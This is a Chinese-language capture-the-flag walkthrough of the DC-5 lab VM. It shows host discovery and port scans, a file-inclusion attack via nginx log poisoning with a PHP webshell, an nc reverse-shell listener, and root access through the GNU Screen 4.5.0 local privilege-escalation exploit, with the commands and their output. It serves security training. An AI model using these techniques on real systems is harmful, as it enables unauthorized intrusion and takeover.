实验环境
kali2020版本: ip 172.25.0.69
DC5: MAC 00:0c:29:b2:15:58
0x01 主机发现
netdiscover工具匹配mac地址得到DC5-ip为172.25.0.67
kali@kali:~$ sudo netdiscover -i eth0 -r 172.25.0.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
7 Captured ARP Req/Rep packets, from 4 hosts. Total size: 420
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
172.25.0.1 00:50:56:c0:00:08 4 240 VMware, Inc.
172.25.0.2 00:50:56:f8:42:a0 1 60 VMware, Inc.
172.25.0.67 00:0c:29:b2:15:58 1 60 VMware, Inc.
172.25.0.100 00:50:56:f7:88:92 1 60 VMware, Inc.
0x02 端口扫描
kali@kali:~$ sudo nmap -A -p- 172.25.0.67
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-25 05:46 EST
Nmap scan report for 172.25.0.67
Host is up (0.00047s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 33509/tcp6 status
| 100024 1 35146/udp status
| 100024 1 45526/tcp status
|_ 100024 1 47967/udp6 status
45526/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:B2:15:58 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 172.25.0.67
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.32 seconds
0x03 漏洞发现与利用
直接从web方面入手
留言表单GET方式向后台提交参数,尝试在该区域进行测试,是否存在SQLI或者其他漏洞,通过bp抓包对比响应包,发现响应包长度以及内容都无变化,遂放弃SQLI,但是发现页脚版权信息不同,故猜想thankyou.php页面是否存在文件包含漏洞
为什么会想到文件包含漏洞??
联想网站开发流程,网页重复内容都会通过文件包含的方式来简化开发过程。
-
web根目录文件名爆破
image.png
0x03 FUZZ
fuzz测试发现存在文件包含漏洞
并发现thankyou.php页面文件包含变量名为file
image.png
bp爆破日志文件目录为 /var/log/nginx/access.log
image.png
向日志文件写入php一句话木马
image.png
通过中国蚁剑连接
http://172.25.0.67/thankyou.php?file=/var/log/nginx/access.log
image.png
nc反弹shell
image.png
kali@kali:~$ nc -lvvp 1234
listening on [any] 1234 ...
172.25.0.67: inverse host lookup failed: Unknown host
connect to [172.25.0.69] from (UNKNOWN) [172.25.0.67] 33530
python -c 'import pty;pty.spawn("/bin/bash")'
0x04 suid提权
查找www-data用户具有suid权限的命令
www-data@dc-5:~/html$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs
查找screen4.5.0命令存在本地权限提升漏洞
并下载exp通过蚁剑上传到DC5 /tmp可上传文件路径
kali@kali:~$ sudo searchsploit screen 4.5.0
[sudo] password for kali:
---------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
---------------------------------------------- ----------------------------------------
GNU Screen 4.5.0 - Local Privilege Escalation | exploits/linux/local/41152.txt
GNU Screen 4.5.0 - Local Privilege Escalation | exploits/linux/local/41154.sh
---------------------------------------------- ----------------------------------------
Shellcodes: No Result
kali@kali:~$ searchsploit -m 41154
Exploit: GNU Screen 4.5.0 - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/41154
Path: /usr/share/exploitdb/exploits/linux/local/41154.sh
File Type: Bourne-Again shell script, ASCII text executable, with CRLF line terminators
Copied to: /home/kali/41154.sh
该漏洞exp shell脚本可能无法直接利用,建议代码分拆执行,分拆过程不过多赘述。
通过exp提权成功,并且拿到flag
www-data@dc-5:/tmp$ ls
ls
libhax.c libhax.so rootshell rootshell.c toroot.sh
www-data@dc-5:/tmp$ chmod +x toroot.sh
chmod +x toroot.sh
www-data@dc-5:/tmp$ ./toroot.sh
./toroot.sh
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.
# whoami
whoami
root
# /bin/bash
/bin/bash
root@dc-5:/etc# cd /root
cd /root
root@dc-5:/root# ls
ls
thisistheflag.txt
root@dc-5:/root# cat thisistheflag.txt
cat thisistheflag.txt
888b 888 d8b 888 888 888 888
8888b 888 Y8P 888 888 888 888
88888b 888 888 888 888 888
888Y88b 888 888 .d8888b .d88b. 888 888 888 .d88b. 888d888 888 888 888 888 888
888 Y88b888 888 d88P" d8P Y8b 888 888 888 d88""88b 888P" 888 .88P 888 888 888
888 Y88888 888 888 88888888 888 888 888 888 888 888 888888K Y8P Y8P Y8P
888 Y8888 888 Y88b. Y8b. Y88b 888 d88P Y88..88P 888 888 "88b " " "
888 Y888 888 "Y8888P "Y8888 "Y8888888P" "Y88P" 888 888 888 888 888 888
Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated. :-)
I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.
root@dc-5:/root#
网友评论